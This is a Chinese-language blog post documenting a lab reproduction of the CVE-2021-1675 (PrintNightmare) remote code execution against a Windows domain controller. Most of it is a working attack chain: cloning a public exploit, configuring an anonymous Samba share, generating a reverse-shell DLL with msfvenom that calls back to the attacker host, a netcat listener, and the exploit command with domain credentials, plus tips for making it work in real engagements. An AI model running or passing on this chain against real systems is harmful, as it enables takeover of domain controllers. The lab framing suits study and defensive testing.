CVE-2021-1675遠端RCE復現
阿新 • • 發佈:2021-10-26
前言
為了復現前幾天爆出的CVE-2021-1675遠端RCE,我的週末過得很充實,謹以此篇記錄那個永遠都回不來的週末。
測試環境
DC:Windows Server 2019 192.168.110.110
PC:Windows 10 192.168.110.120
Attack:Kali2020.3 192.168.110.132
在域控Windows Server 2019
上建立普通域使用者user1
,使用user1
登入域主機Windows 10
確定可用
遠端RCE復現
exp地址:https://github.com/cube0x0/CVE-2021-1675
git clone https://github.com/cube0x0/CVE-2021-1675.git
按照exp專案上smb上傳後執行的方法,配置kali的smb配置檔案/etc/samba/smb.conf:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody
啟動smb
impacket-smbserver smb /tmp/
kali使用msf生成dll木馬:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.110.132 LPORT=7777 -f dll -o /tmp/sjbs.dll
並監聽埠:
nc -lvvp 7777
執行exp:
python3 CVE-2021-1675.py hacker.test/win10:ShiJinBuShi@192.168.110.110 '\\192.168.110.132\smb\sjbs.dll'
看到剛生成的dll木馬成功上傳到了域控伺服器:
接收到shell:
踩到的坑
域控伺服器:最開始是使用的Windows Server 2012 R2
,可惜不管什麼姿勢都無法成功。後來學長告訴我:
Kali的smb服務:正常起smb服務後執行exp報錯了
本地測試一下:
管理員許可權powershell啟用smb1後就好了:
Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
但是實戰中我們不可能去域控上開啟SMB1,所以只需要Windows開啟smb,將dll檔案放在Windows的共享目錄並在執行exp時使用該地址即可。
本篇參考: